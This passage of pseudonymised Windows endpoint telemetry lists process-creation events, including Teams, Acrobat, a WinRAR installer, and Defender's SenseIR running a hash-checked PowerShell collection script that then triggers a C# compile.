+738,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:53.448098100+00:00,14504,dllhost.exe,DllHost.exe /Processid:{338B40F9-9D68-4B53-A793-6B9AA0C5F63B},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:53.720622100+00:00,2021-06-24 00:55:36.380303400+00:00,ec8a94ff-03f9-42a2-b8eb-ec91398fb7ee,computerpii_0a470890c60768167990033d701e7bd881398861,169297,False,10.7740.19041.1052,False,11540474045136908,,11540474045175354,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,svchost.exe,504,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+739,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:54.343273600+00:00,8960,FullTrustNotifier.exe,"""FullTrustNotifier.exe"" SetDeviceId did=""fd2d6ee4-7db5-4f8e-92e8-cc9cfc449a55""",PortableExecutable,2020-10-22 07:42:28+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\FullTrustNotifier.exe,218608,5236a3cd1fc50ea204f57c9f66787dc6,79f2749d62da14edd4b797d0af539e996841c237795932c299b847bb7d2cd159,ba01717f097852cd19729f5e3146076d12bcc5c7,77b989aab779490036bd3e4726bbef86,59c90ae4846f8e491c2a5aca0ac32e17e275a7f5beb5e3ac7aa09546e760cc45,77e0aac688d8e540f63fd490473b2570587a5ba4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:40.546030300+00:00,10668,AdobeCollabSync.exe,"""AdobeCollabSync.exe""  --type=collab-renderer --proc=18820",False,2021-06-24 00:52:40.477041800+00:00,18820,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:55.264654500+00:00,2021-06-24 00:55:36.380500600+00:00,121466ae-72ed-4094-bff2-e1f8234cf7d5,computerpii_0a470890c60768167990033d701e7bd881398861,169301,False,10.7740.19041.1052,False,11540474045175230,,11540474045175355,2021-06-24 00:52:40.546030300+00:00,10668,2021-06-24 00:52:40.546030300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe,10668,2176,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,5549280,2021-05-28 03:22:03+00:00,2021-05-28 05:59:00+00:00,2021-06-24 00:52:40.482920+00:00,2021-05-28 05:59:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+740,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:58:27.984030100+00:00,6524,rundll32.exe,"rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 11:00:36.306235700+00:00,7032,svchost.exe,svchost.exe -k wsappx -p -s AppXSvc,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:58:28.029536400+00:00,2021-06-24 00:59:55.556492900+00:00,c637988e-d881-4512-b138-15e5fbffb649,computerpii_0a470890c60768167990033d701e7bd881398861,169572,False,10.7740.19041.1052,False,11540474045175050,,11540474045175376,2021-06-23 11:00:36.306235700+00:00,7032,2021-06-23 11:00:36.306235700+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,7032,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-18 00:35:29.821925200+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+741,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:58:47.784951700+00:00,19716,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1784,798869040387949835,14039564101966597118,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:38.077847800+00:00,3760,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 00:52:35.937594200+00:00,10608,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:58:48.353647100+00:00,2021-06-24 00:59:55.557379+00:00,864991f6-853b-4979-bed4-bc593a3b8a53,computerpii_0a470890c60768167990033d701e7bd881398861,169589,False,10.7740.19041.1052,False,11540474045175219,,11540474045175378,2021-06-24 00:52:38.077847800+00:00,3760,2021-06-24 00:52:38.077847800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,3760,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,20864.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+742,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:02:16.603198+00:00,676,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'bd8fdffb51c0651adc1ce2a6332eed22b69b77119c214ae0048e24e1342c27a0')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 02:55:16.210663100+00:00,19080,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""4532"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:02:16.641056700+00:00,2021-06-23 03:03:34.194983900+00:00,d30cc981-94e1-4ada-91d5-b1960cbf9389,computerpii_0a470890c60768167990033d701e7bd881398861,160497,False,10.7740.19041.1052,False,11540474045172860,,11540474045172920,2021-06-23 02:55:16.210663100+00:00,19080,2021-06-23 02:55:16.210663100+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,19080,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 02:55:16.213537200+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+743,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:02:16.609633600+00:00,18276,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 03:02:16.603198+00:00,676,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'bd8fdffb51c0651adc1ce2a6332eed22b69b77119c214ae0048e24e1342c27a0')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' }""",True,2021-06-23 02:55:16.210663100+00:00,19080,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:02:16.641477300+00:00,2021-06-23 03:03:34.195053700+00:00,418d412b-0d36-4d48-99ae-1f988a97d574,computerpii_0a470890c60768167990033d701e7bd881398861,160498,False,10.7740.19041.1052,False,11540474045172920,,11540474045172921,2021-06-23 03:02:16.603198+00:00,676,2021-06-23 03:02:16.603198+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,676,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+744,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:02:20.014319500+00:00,2080,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\3k31tt51.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 03:02:16.603198+00:00,676,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'bd8fdffb51c0651adc1ce2a6332eed22b69b77119c214ae0048e24e1342c27a0')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' }""",True,2021-06-23 02:55:16.210663100+00:00,19080,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:02:20.027413100+00:00,2021-06-23 03:03:34.196007+00:00,a78a6816-ffff-481b-9d73-588e10b2f712,computerpii_0a470890c60768167990033d701e7bd881398861,160519,False,10.7740.19041.1052,False,11540474045172920,,11540474045172922,2021-06-23 03:02:16.603198+00:00,676,2021-06-23 03:02:16.603198+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,676,16512,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 02:55:26.342673700+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,0.0,257.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+745,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:02:20.095734+00:00,4668,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_813555130eccb57c5b775fb2b36381be20fca3e6.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_2af7f68bdac92ea3e9f64cefa4ea1b0795a0ea46.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-23 03:02:20.014319500+00:00,2080,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\3k31tt51.cmdline""",True,2021-06-23 03:02:16.603198+00:00,676,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:02:20.202605+00:00,2021-06-23 03:03:34.196314300+00:00,3699f8b3-1ed3-46ea-ae8c-1c733fb21441,computerpii_0a470890c60768167990033d701e7bd881398861,160526,False,10.7740.19041.1052,False,11540474045172922,,11540474045172923,2021-06-23 03:02:20.014319500+00:00,2080,2021-06-23 03:02:20.014319500+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2080,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 03:01:19.425920800+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,0.0,257.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+746,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:05:33.498619700+00:00,15500,winrar-x64-602.exe,"""winrar-x64-602.exe"" ",PortableExecutable,2021-06-23 03:04:42.400906800+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\winrar-x64-602.exe,3338648,fc61fdcad5a9d52a01bd2d596f2c92b9,9e6f6adcbc67cfa9854ecc31684dd6b9f7210374c2b98b62380ceb17b49f64bc,77ab1e20c685e716b82c7c90b373316fc84cde23,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:19.951048300+00:00,11452,explorer.exe,Explorer.EXE,False,2021-06-23 00:51:19.663301200+00:00,18268,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:05:33.866648300+00:00,2021-06-23 03:07:42.494422500+00:00,70404455-acbd-4027-88aa-6d8573b57f7b,computerpii_0a470890c60768167990033d701e7bd881398861,160615,False,10.7740.19041.1052,False,11540474045171770,,11540474045172956,2021-06-23 00:51:19.951048300+00:00,11452,2021-06-23 00:51:19.951048300+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,11452,18560,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-23 00:51:19.952611900+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Alexander Roshal,WinRAR,6.2.0,WinRAR,WinRAR.exe,WinRAR archiver
+747,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 03:05:33.642681+00:00,19688,consent.exe,consent.exe 3388 438 000001C181428730,PortableExecutable,2021-02-17 04:35:10.855703500+00:00,C:\Windows\System32\consent.exe,166216,6646631ce4ad7128762352da81f3b030,56b2d516376328129132b815e22379ae8e7176825f059c9374a33cc844482e64,1095bd4b63360fc2968d75622aa745e5523428ab,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:47:25.157136200+00:00,3388,svchost.exe,svchost.exe -k netsvcs -p -s Appinfo,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:05:33.871210200+00:00,2021-06-23 03:07:42.494481+00:00,c0d5660c-18db-4816-83dc-e2e411824d4c,computerpii_0a470890c60768167990033d701e7bd881398861,160616,False,10.7740.19041.1052,False,11540474045137067,,11540474045172957,2021-06-10 00:47:25.157136200+00:00,3388,2021-06-10 00:47:25.157136200+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,3388,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:47:25.530432200+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,consent,consent.exe,Consent UI for administrative applications
